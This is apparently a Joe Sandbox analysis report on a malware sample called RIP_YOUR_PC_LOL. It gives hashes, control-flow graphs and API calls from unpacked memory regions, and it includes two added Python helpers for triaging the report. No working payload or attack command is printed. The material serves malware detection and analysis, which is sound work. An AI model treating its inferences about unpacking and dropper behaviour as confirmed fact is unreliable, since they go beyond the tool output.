• Source File: 00000000.00000002.695692735.000000000283A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0283A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_283a000_RIP_YOUR_PC_LOL.jbxd
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: edf9c0d8a9e0ff5379d8e4130987c5d9a4ebdc30ba7f4e8c9cba256f48b8e74f
• Instruction ID: 9fd25c56056099479bc049afb71c4322ec5e835fcd73bb60394530c9b64e1dcf
• Opcode Fuzzy Hash: edf9c0d8a9e0ff5379d8e4130987c5d9a4ebdc30ba7f4e8c9cba256f48b8e74f
• Instruction Fuzzy Hash: F9F0AF39908244CFDB118F19E889766FFA0EF04320F0CC09ADD898F356D279A408DEB2
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
Basic blocks (id: address range; successors after ->). No API call is resolved in this function:
• 109: 4340569-43405fa -> 119, 120
• 119: 4340625-434063e -> 122, 123
• 120: 43405fc-4340619 -> 126
• 122: 4340640 -> 123
• 123: 4340649
• 126: 4340620-4340623 -> 119, 120
Strings
Memory Dump Source
• Source File: 00000000.00000002.696274098.0000000004340000.00000040.00000800.00020000.00000000.sdmp, Offset: 04340000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4340000_RIP_YOUR_PC_LOL.jbxd
Similarity
• API ID:
• String ID: $gEq
• API String ID: 0-3917529146
• Opcode ID: 24652d5f3c054f145e57a5165312442d36085a39e6ea1a5ce0bdb364cc846667
• Instruction ID: 47bb552823e94cd8ec296663e25298e405de20fed521087196f0e567e341607a
• Opcode Fuzzy Hash: 24652d5f3c054f145e57a5165312442d36085a39e6ea1a5ce0bdb364cc846667
• Instruction Fuzzy Hash: 20219070F002069BEB589F7984A4BEDBBF6AFC8304F14446DD542E7391DE75AC058B91
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
Graph data as exported by the plugin (node id followed by its address range; "addr call target" is a call site with one resolved target; edges as id->id). The call site at 4340085 has five resolved targets (4340006, 4340070, 4340140, 21a05cf, 21a05f6), the last two outside the 04340000 dump:
127 4340070-434007f 173 4340085 call 4340006 127->173 174 4340085 call 4340070 127->174 175 4340085 call 4340140 127->175 176 4340085 call 21a05cf 127->176 177 4340085 call 21a05f6 127->177 128 434008b-43400b1 131 43400b3-43400c9 128->131 132 43400de-43400f0 128->132 133 4340135-4340192 131->133 134 43400cb-43400dc 131->134 132->133 139 43400f2-4340123 132->139 144 4340199-43401af 133->144 134->131 134->132 147 434012d-4340134 139->147 149 43401b1-43401bd 144->149 150 4340222-4340235 144->150 155 43401bf-43401c5 149->155 156 43401cb-43401cd 149->156 151 4340248-434024c 150->151 152 4340257 151->152 153 434024e 151->153 159 4340258 152->159 153->152 160 43401c7 155->160 161 43401c9 155->161 157 4340237-4340241 156->157 158 43401cf-43401db 156->158 157->150 164 4340243 157->164 165 43401f5-4340200 158->165 166 43401dd-43401e3 158->166 159->159 160->156 161->156 164->149 165->157 171 4340202-4340220 165->171 167 43401e5 166->167 168 43401e7-43401f3 166->168 167->165 168->165 171->151 173->128 174->128 175->128 176->128 177->128
Memory Dump Source
• Source File: 00000000.00000002.696274098.0000000004340000.00000040.00000800.00020000.00000000.sdmp, Offset: 04340000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4340000_RIP_YOUR_PC_LOL.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5a302c755974fd205d4d25d891e2618f8ab787c915ad0dd5c9d6eb26b1dcc8c1
• Instruction ID: 21436d6c2157c28b9a9e2cd3532ca55bb31732c770b02992241f4ce800d073c5
• Opcode Fuzzy Hash: 5a302c755974fd205d4d25d891e2618f8ab787c915ad0dd5c9d6eb26b1dcc8c1
• Instruction Fuzzy Hash: 5651B634B0021ACFCB199B798454BAE7AF6AFC8310F148569D515EB785DF74BC01CBA1
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
Basic blocks (id: address range; successors after ->). Block 200 calls the function at 4340569 listed above; block 205 loops on itself:
• 178: 43402f0-43403ba -> 190
• 190: 43403f5-43403fe -> 191, 192
• 191: 4340424-434042d -> 194, 195
• 192: 4340400-4340406 -> 191, 193
• 193: 4340408-4340411 -> 196, 197
• 194: 434042f -> 195
• 195: 4340439-4340448 -> 198
• 196: 4340467 -> 201
• 197: 4340413-4340422 -> 198
• 198: 434044a-434044c -> 199, 200
• 199: 4340452-4340465 -> 201
• 200: 43403bc-43403c2, call 4340569 -> 202
• 201: 434046c -> 205
• 202: 43403c8-43403d3 -> 203, 204
• 203: 43403d5-43403d9 -> 204
• 204: 43403e0-43403f2 -> 190
• 205: 434046d -> 205
Memory Dump Source
• Source File: 00000000.00000002.696274098.0000000004340000.00000040.00000800.00020000.00000000.sdmp, Offset: 04340000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4340000_RIP_YOUR_PC_LOL.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b933a988c8392a9f9cb2ec71dc8f4f124ad520ebe1c7a49a10a5ae6a2c8faa83
• Instruction ID: c8b2a0c3537f9f2d80a22f4a3fa94e013254104356042cfbf1d7d6da74a1e0f1
• Opcode Fuzzy Hash: b933a988c8392a9f9cb2ec71dc8f4f124ad520ebe1c7a49a10a5ae6a2c8faa83
• Instruction Fuzzy Hash: 0E410934B00609DFCB09DFA8C49099EBBF2EF88710B248569D915AB355DB34AC42CFA1
Uniqueness
Uniqueness Score: -1.00%

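The entries in this section are flat tool output, and several of them are overlapping views of one piece of code (for example the two GetFileType entries that both reference the call site 0283A669, one starting at 283a5e3 and one at 283a616). The following Python is an added triage helper, not Joe Sandbox code and not part of this report: it parses entries in the plain-text layout shown on this page into records, lists which APIs each memory-dump region calls, flags entries that reach the same API call site (alternative entry points into one function body, to be counted once), and lists regions marked "based on PE: false". The sample text is a constructed subset of three entries copied from this page; the reading of "based on PE: false" as memory not backed by an on-disk image is an assumption stated in the code.

```python
"""Parse Joe Sandbox per-function summaries (plain-text layout as on this
page) and answer two triage questions: which Win32 APIs each dump region
calls, and which entries are overlapping views of the same code.

Added example; not Joe Sandbox code. The field labels matched below
("Control-flow Graph", "ref:", "Offset:", "based on PE:",
"Instruction Fuzzy Hash:") are the ones visible in the report."""
import re
from collections import defaultdict

# Constructed sample: three entries copied from this page (indentation and
# graph legend removed, only the fields the parser needs kept).
SAMPLE = """\
Control-flow Graph
control_flow_graph 43 283a5e3-283a661 47 283a663-283a676 GetFileType 43->47 48 283a696-283a69b 43->48
APIs
• GetFileType.KERNELBASE(?,00000E2C,EB14EF02,00000000,00000000,00000000,00000000), ref: 0283A669
Memory Dump Source
• Source File: 00000000.00000002.695692735.000000000283A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0283A000, based on PE: false
Similarity
• API ID: FileType
• Instruction Fuzzy Hash: 5B21D8B54083806FE7128B61DC41FA2BFA8DF46320F0884DBED849F253D268A909DB71
Uniqueness Score: -1.00%
Control-flow Graph
control_flow_graph 76 283a616-283a661 79 283a663-283a676 GetFileType 76->79
APIs
• GetFileType.KERNELBASE(?,00000E2C,EB14EF02,00000000,00000000,00000000,00000000), ref: 0283A669
Memory Dump Source
• Source File: 00000000.00000002.695692735.000000000283A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0283A000, based on PE: false
Similarity
• API ID: FileType
• Instruction Fuzzy Hash: 2501D27A504204AFF711CB51DC85F66FB98DF44720F18C4AAED49AB352E278E508CEB5
Uniqueness Score: -1.00%
Control-flow Graph
control_flow_graph 109 4340569-43405fa 119 4340625-434063e 109->119
Strings
Memory Dump Source
• Source File: 00000000.00000002.696274098.0000000004340000.00000040.00000800.00020000.00000000.sdmp, Offset: 04340000, based on PE: false
Similarity
• API ID:
• String ID: $gEq
• Instruction Fuzzy Hash: 20219070F002069BEB589F7984A4BEDBBF6AFC8304F14446DD542E7391DE75AC058B91
Uniqueness Score: -1.00%
"""

BULLET = r"^(?:•\s*)?"                       # bullets are optional in the text form
CFG_RE = re.compile(r"^control_flow_graph\s+\d+\s+([0-9a-fA-F]+)")   # first node's start
API_RE = re.compile(BULLET + r"(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9a-fA-F]+)\s*$")
SRC_RE = re.compile(r"Offset:\s*([0-9a-fA-F]+),\s*based on PE:\s*(true|false)")
IHASH_RE = re.compile(BULLET + r"Instruction Fuzzy Hash:\s*([0-9A-Fa-f]+)\s*$")


def parse_entries(text):
    """One dict per function entry: start address, (api, module, call-site)
    tuples, dump-region offset, PE-backed flag and instruction fuzzy hash."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Control-flow Graph":      # every entry opens with this header
            cur = {"start": None, "apis": [], "region": None,
                   "pe_backed": None, "ihash": None}
            entries.append(cur)
            continue
        if cur is None:
            continue
        if (m := CFG_RE.match(line)):
            cur["start"] = int(m.group(1), 16)
        elif (m := API_RE.match(line)):
            cur["apis"].append((m.group(1), m.group(2), int(m.group(4), 16)))
        elif (m := SRC_RE.search(line)):
            cur["region"] = int(m.group(1), 16)
            cur["pe_backed"] = (m.group(2) == "true")
        elif (m := IHASH_RE.match(line)):
            cur["ihash"] = m.group(1)
    return entries


def apis_by_region(entries):
    """Dump-region offset -> sorted distinct API names called from it."""
    seen = defaultdict(set)
    for e in entries:
        names = seen[e["region"]]             # registers regions with no API calls too
        names.update(name for name, _module, _site in e["apis"])
    return {region: sorted(names) for region, names in seen.items()}


def overlapping_entries(entries):
    """API call-site address -> sorted start addresses of every entry that
    reaches it, restricted to sites reached from more than one entry. Such
    groups are alternative entry points into one function body and should be
    counted once when sizing the unpacked code."""
    sites = defaultdict(set)
    for e in entries:
        for _name, _module, site in e["apis"]:
            sites[site].add(e["start"])
    return {site: sorted(starts) for site, starts in sites.items() if len(starts) > 1}


def unbacked_regions(entries):
    """Regions flagged "based on PE: false". Assumption: the flag means the
    dumped memory was not backed by an image on disk, i.e. code written at
    run time (unpacked or injected), which is where the API calls above live."""
    return sorted({e["region"] for e in entries if e["pe_backed"] is False})


if __name__ == "__main__":
    ents = parse_entries(SAMPLE)
    for region, names in apis_by_region(ents).items():
        print(f"region {region:08X}: {', '.join(names) or '(no API calls)'}")
    for site, starts in overlapping_entries(ents).items():
        print(f"call site {site:08X} reached from entries at "
              + ", ".join(f"{s:08X}" for s in starts))
    print("unbacked regions:", [f"{r:08X}" for r in unbacked_regions(ents)])
```

Run it against the full text of this section (stripped of indentation) to get a per-region API inventory; the three-entry sample yields GetFileType for region 0283A000, nothing for 04340000, and one overlap group at call site 0283A669.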
Control-flow Graph
Graph data as exported by the plugin (node id followed by its address range; "addr call target" is a call site with one resolved target; edges as id->id). This entry starts at 4340006 and otherwise has the same blocks and edges as the entry starting at 4340070 above, including the five-target call site at 4340085:
208 4340006-434007f 255 4340085 call 4340006 208->255 256 4340085 call 4340070 208->256 257 4340085 call 4340140 208->257 258 4340085 call 21a05cf 208->258 259 4340085 call 21a05f6 208->259 210 434008b-43400b1 213 43400b3-43400c9 210->213 214 43400de-43400f0 210->214 215 4340135-4340192 213->215 216 43400cb-43400dc 213->216 214->215 221 43400f2-4340123 214->221 226 4340199-43401af 215->226 216->213 216->214 229 434012d-4340134 221->229 231 43401b1-43401bd 226->231 232 4340222-4340235 226->232 237 43401bf-43401c5 231->237 238 43401cb-43401cd 231->238 233 4340248-434024c 232->233 234 4340257 233->234 235 434024e 233->235 241 4340258 234->241 235->234 242 43401c7 237->242 243 43401c9 237->243 239 4340237-4340241 238->239 240 43401cf-43401db 238->240 239->232 246 4340243 239->246 247 43401f5-4340200 240->247 248 43401dd-43401e3 240->248 241->241 242->238 243->238 246->231 247->239 253 4340202-4340220 247->253 249 43401e5 248->249 250 43401e7-43401f3 248->250 249->247 250->247 253->233 255->210 256->210 257->210 258->210 259->210
Memory Dump Source
• Source File: 00000000.00000002.696274098.0000000004340000.00000040.00000800.00020000.00000000.sdmp, Offset: 04340000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4340000_RIP_YOUR_PC_LOL.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8a2e3ede783fa7e93df6953233ab9e069da0d832f87d5922c9f01a6bef584522
• Instruction ID: 976dae381daccd11aa962d144c05bb1d2729d3d72b9d83d6c9f8e8b2aef37a64
• Opcode Fuzzy Hash: 8a2e3ede783fa7e93df6953233ab9e069da0d832f87d5922c9f01a6bef584522
• Instruction Fuzzy Hash: 3741E77460E3C69FD7078B7498606AABFF1AF87214B1A40E7D485DF1A3C624AC05C772
Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

(rendered graph omitted) Basic blocks 43408c0-43409c5; no calls or API references in this function.
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.696274098.0000000004340000.00000040.00000800.00020000.00000000.sdmp, Offset: 04340000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_4340000_RIP_YOUR_PC_LOL.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 081abb9302932f12232896ae5ae2919ff467c6798680c9d1e6ffac092f58a193
                                                                                                          • Instruction ID: dea675a5b74ba471ecfef7da1fb151be44936d8a556b478ab0e801e90923ebb9
                                                                                                          • Opcode Fuzzy Hash: 081abb9302932f12232896ae5ae2919ff467c6798680c9d1e6ffac092f58a193
                                                                                                          • Instruction Fuzzy Hash: 8221D03AB1021387EF2D56B194202BE32E65BC4164B54A638CF4A9B354FE35EC42C7E5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.696274098.0000000004340000.00000040.00000800.00020000.00000000.sdmp, Offset: 04340000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_4340000_RIP_YOUR_PC_LOL.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 98604673a9f934a7933dd454831a812d64e95fc24038cd6054257fe33068ffe7
                                                                                                          • Instruction ID: 75c43629ba277ed37677367b55564539f431a0c161e8161417d1ef6dd692cc89
                                                                                                          • Opcode Fuzzy Hash: 98604673a9f934a7933dd454831a812d64e95fc24038cd6054257fe33068ffe7
                                                                                                          • Instruction Fuzzy Hash: DF215A35F012198BDB299B6585646EE7BF6ABC8360F145429DA06E7380DB78A801CFD1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.696274098.0000000004340000.00000040.00000800.00020000.00000000.sdmp, Offset: 04340000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_4340000_RIP_YOUR_PC_LOL.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 27a4189bbc7e7335dc6e23836edd7a39429f23705fceef6cc3399c00d0240ea4
                                                                                                          • Instruction ID: 7e6585626805b673a71162ec0bfca4115bd9ec8fe09c9ecfd712a1f34b75a210
                                                                                                          • Opcode Fuzzy Hash: 27a4189bbc7e7335dc6e23836edd7a39429f23705fceef6cc3399c00d0240ea4
                                                                                                          • Instruction Fuzzy Hash: 64219F38F00259CBCB299F7884586BE7AF66FC8350F185029CA11E7681DF34A841CB95
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.696274098.0000000004340000.00000040.00000800.00020000.00000000.sdmp, Offset: 04340000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_4340000_RIP_YOUR_PC_LOL.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6e19fb184ed95cdefff6ae9e1cc4c42cbbf261f2bfed6a104756529d9f99faf1
                                                                                                          • Instruction ID: f181e440f390028e0a16b08386186262aa63766e02fd8374e3068306bda1264c
                                                                                                          • Opcode Fuzzy Hash: 6e19fb184ed95cdefff6ae9e1cc4c42cbbf261f2bfed6a104756529d9f99faf1
                                                                                                          • Instruction Fuzzy Hash: 9E31A234E04609DBDB09CF99D48099DBBF2BF89310F219869E905AB355DB31B842CF40
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.696274098.0000000004340000.00000040.00000800.00020000.00000000.sdmp, Offset: 04340000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_4340000_RIP_YOUR_PC_LOL.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 7a49e9edafc4e3fb00321f1fb02e6d3caee9405d2cb341c7009abed3f679766d
                                                                                                          • Instruction ID: 6b656c0d0a748b759e8a7a76b8f29bbf9b0d017760fea0bb0cd34957fc004039
                                                                                                          • Opcode Fuzzy Hash: 7a49e9edafc4e3fb00321f1fb02e6d3caee9405d2cb341c7009abed3f679766d
                                                                                                          • Instruction Fuzzy Hash: B8118638F001158BCF59DB7584105EEBAF7ABC81507604469D909E7340FF34AD02CBE6
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.694006679.00000000021A0000.00000040.00000020.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_21a0000_RIP_YOUR_PC_LOL.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d09708bd4f3645cf84ba5e788dc7c886317a219a5300f1123f75329830ad172a
                                                                                                          • Instruction ID: 8b48727d33edcfa165ce5130c689e445692c0c9f532f5f01dbe0cb33b11cb4d7
                                                                                                          • Opcode Fuzzy Hash: d09708bd4f3645cf84ba5e788dc7c886317a219a5300f1123f75329830ad172a
                                                                                                          • Instruction Fuzzy Hash: 4701D8B650C3806FD7118F16DC54863BFB8EF86230709C4AFEC498B612D225B909CB72
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.696274098.0000000004340000.00000040.00000800.00020000.00000000.sdmp, Offset: 04340000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_4340000_RIP_YOUR_PC_LOL.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 20504aee6fff837d09e1c696b6bb03ae49677e5df9101e1af03897559fcf0cf0
                                                                                                          • Instruction ID: 8327521054c4ad8b3ca1ba47f3bef452f5b8f4e236ac840abb590bc165fbc433
                                                                                                          • Opcode Fuzzy Hash: 20504aee6fff837d09e1c696b6bb03ae49677e5df9101e1af03897559fcf0cf0
                                                                                                          • Instruction Fuzzy Hash: EFF0A476F001558FCB64DB7C58811EEBBF6EB9C210B60403AC60DE3200FA319A038F91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.694006679.00000000021A0000.00000040.00000020.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_21a0000_RIP_YOUR_PC_LOL.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 99eb574678cc25eed2da2e59760a6a0d77ce24399e5b16796f2354f78621a3f7
                                                                                                          • Instruction ID: 2aeb1cd7e8052e093aefeca6455e8e15a17e5fcbdf9db76ad621645cdf985c14
                                                                                                          • Opcode Fuzzy Hash: 99eb574678cc25eed2da2e59760a6a0d77ce24399e5b16796f2354f78621a3f7
                                                                                                          • Instruction Fuzzy Hash: 38E06DB66046004B9650CF0AEC41852F798EB88630B18C06FDC0D8B711E139B5048EB5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Execution Graph

Execution Coverage: 21.5%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 29
Total number of Limit Nodes: 2
(rendered graph omitted) Nodes with API calls: 148a528 and 148a56a -> FindCloseChangeNotification; 148a41b and 148a452 -> CreateFileW; 148a2dc and 148a2fe -> SetErrorMode; 148a5e3 -> GetFileType; 148a6a4 and 148a6d6 -> WriteFile.
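The coverage figures above are the part of this block a triager should read first: every function the sandbox disassembled here lives in dynamically allocated or decrypted memory, and every Memory Dump Source line in this section says based on PE: false, i.e. the code was never part of the on-disk image. That is what unpacking and process hollowing look like from the memory side. The script below is an added example, not part of the Joe Sandbox report or its tooling: it parses the Memory Dump Source and APIs lines as printed in this report into a per-process list of executable, writable, non-PE-backed regions together with the APIs referenced from them. It assumes that the fifth dotted field of the .sdmp name is the region's page-protection value; that field order is not documented on this page and is inferred only from the fourth field always equalling the printed Offset. The protection constants are the standard winnt.h values. The sample lines are copied from this report (process 0 is RIP_YOUR_PC_LOL.exe, process 4 is the process whose snapshot file is named healastounding).

```python
import re

# Standard Windows page-protection flags (winnt.h).
PAGE_READWRITE = 0x04
PAGE_WRITECOPY = 0x08
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
EXECUTABLE_MASK = PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
WRITABLE_MASK = PAGE_READWRITE | PAGE_WRITECOPY | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY

# "Source File: <name>.sdmp, Offset: <hex>, based on PE: <bool>" exactly as the report prints it.
SOURCE_RE = re.compile(
    r"Source File:\s*(?P<name>[0-9A-Fa-f.]+)\.sdmp,\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)", re.IGNORECASE)
# "<Api>.<Module>(<args>), ref: <hex>" as printed under "APIs".
API_RE = re.compile(
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")

# Constructed sample: lines copied from this report.
SAMPLE = """
• Source File: 00000000.00000002.696274098.0000000004340000.00000040.00000800.00020000.00000000.sdmp, Offset: 04340000, based on PE: false
• Source File: 00000000.00000002.694006679.00000000021A0000.00000040.00000020.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false
• CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0148A4D1
• Source File: 00000004.00000002.511310988.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false
• WriteFile.KERNELBASE(?,00000E2C,1961FADE,00000000,00000000,00000000,00000000), ref: 0148A735
• Source File: 00000004.00000002.511310988.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false
"""


def parse_dump_name(name):
    """Split the dotted .sdmp name.  ASSUMPTION (not documented on the page):
    field 0 = process index, field 1 = run, field 3 = region base, field 4 = page protection.
    Field 3 is trusted only because it always equals the printed Offset."""
    f = name.split(".")
    return {"process": int(f[0]), "run": int(f[1]), "base": int(f[3], 16), "protect": int(f[4], 16)}


def parse_report_lines(text):
    """One record per 'Source File' line, with the APIs printed just above it attached
    (in the report the 'APIs' block precedes the 'Memory Dump Source' block of the same function)."""
    records, pending_apis = [], []
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        m = API_RE.search(line)
        if m:
            pending_apis.append((m["api"], m["module"], m["ref"].upper()))
            continue
        m = SOURCE_RE.search(line)
        if not m:
            continue
        rec = parse_dump_name(m["name"])
        assert rec["base"] == int(m["offset"], 16), "dump-name base does not match printed Offset"
        rec["pe_backed"] = m["pe"].lower() == "true"
        rec["executable"] = bool(rec["protect"] & EXECUTABLE_MASK)
        rec["writable"] = bool(rec["protect"] & WRITABLE_MASK)
        # Executable + writable + not mapped from a PE file is the footprint of unpacked
        # or injected code, which is what the report's "Dynamic/Decrypted Code" refers to.
        rec["dynamic_code"] = rec["executable"] and rec["writable"] and not rec["pe_backed"]
        rec["apis"] = pending_apis
        pending_apis = []
        records.append(rec)
    return records


def summarize(records):
    """Per process: distinct region bases, APIs referenced from them, and whether any
    region carries the dynamic-code footprint."""
    out = {}
    for r in records:
        s = out.setdefault(r["process"], {"regions": set(), "apis": set(), "dynamic_code": False})
        s["regions"].add(r["base"])
        s["apis"].update(api for api, _, _ in r["apis"])
        s["dynamic_code"] |= r["dynamic_code"]
    return {p: {"regions": sorted(s["regions"]), "apis": sorted(s["apis"]),
                "dynamic_code": s["dynamic_code"]} for p, s in out.items()}


if __name__ == "__main__":
    for proc, s in sorted(summarize(parse_report_lines(SAMPLE)).items()):
        print(f"process {proc}: regions {[hex(b) for b in s['regions']]} "
              f"apis {s['apis']} dynamic_code={s['dynamic_code']}")
```

On this report the script reports two RWX private regions in process 0 (021A0000 and 04340000, no API references resolved) and one in process 4 (0148A000, referencing CreateFileW and WriteFile), which is the file-writing stage of the dropper running out of unpacked memory rather than out of the image that was submitted.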

                                                                                                          Callgraph

(rendered graph omitted) 103 function nodes in five address ranges: 0090xxxx, 01482xxx, 0148Axxx, 017A0xxx and 03120xxx. Call edges recorded in the graph:
• Function_017A0070 -> Function_017A0070 (self), Function_017A0140, Function_017A0014, Function_031205CF, Function_031205F6
• Function_017A0014 -> Function_017A0070, Function_017A0140, Function_017A0014 (self), Function_031205CF, Function_031205F6
• Function_03120638 -> Function_0312065A
• Function_017A02F0 -> Function_017A0580
• Function_017A02E0 -> Function_017A0580
• Function_017A06B8 -> Function_017A0769, Function_017A08D8
• Function_017A06A7 -> Function_017A0769, Function_017A08D8
• Function_017A0489 -> Function_017A06B8, Function_017A06A7, Function_031205CF, Function_031205F6

                                                                                                          Control-flow Graph

(rendered graph omitted) Basic blocks 148a41b-148a526; CreateFileW is called in block 148a4cb-148a4ef.
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0148A4D1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.511310988.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_148a000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 823142352-0
                                                                                                          • Opcode ID: eaaf02ceef6912e20653c5c11c85ad16847a15c042329cf3e178971415a5dd14
                                                                                                          • Instruction ID: dcba375103815a851a431ad68967c6c04d650faf10811eba4ad74bf6d8f5233e
                                                                                                          • Opcode Fuzzy Hash: eaaf02ceef6912e20653c5c11c85ad16847a15c042329cf3e178971415a5dd14
                                                                                                          • Instruction Fuzzy Hash: 2E31BEB1505380AFE722CF25DC44B66BFE8EF06214F0884AAE9849B262D375E509CB71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

(rendered graph omitted) Basic blocks 148a452-148a526, overlapping the function at 148a41b and sharing its CreateFileW reference at 0148A4D1; CreateFileW is called in block 148a4cb-148a4d3.
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0148A4D1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.511310988.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_148a000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 823142352-0
                                                                                                          • Opcode ID: 16e9dcec0f5515d78fec618e91f444fc8e216ac85f217b554c37d36d5f1d69a8
                                                                                                          • Instruction ID: 1545646972737d8071db2601388ba8641c5a854e5e7b41d25eab08b7a0a283d9
                                                                                                          • Opcode Fuzzy Hash: 16e9dcec0f5515d78fec618e91f444fc8e216ac85f217b554c37d36d5f1d69a8
                                                                                                          • Instruction Fuzzy Hash: F021B271500600AFEB21DF69DC45B6BFBE8EF04610F14856EEE459B252D375E409CB71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

(rendered graph omitted) Basic blocks 148a6a4-148a77d; WriteFile is called in block 148a72f-148a74f.
                                                                                                          APIs
                                                                                                          • WriteFile.KERNELBASE(?,00000E2C,1961FADE,00000000,00000000,00000000,00000000), ref: 0148A735
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.511310988.000000000148A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_148a000_healastounding.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileWrite
                                                                                                          • String ID:
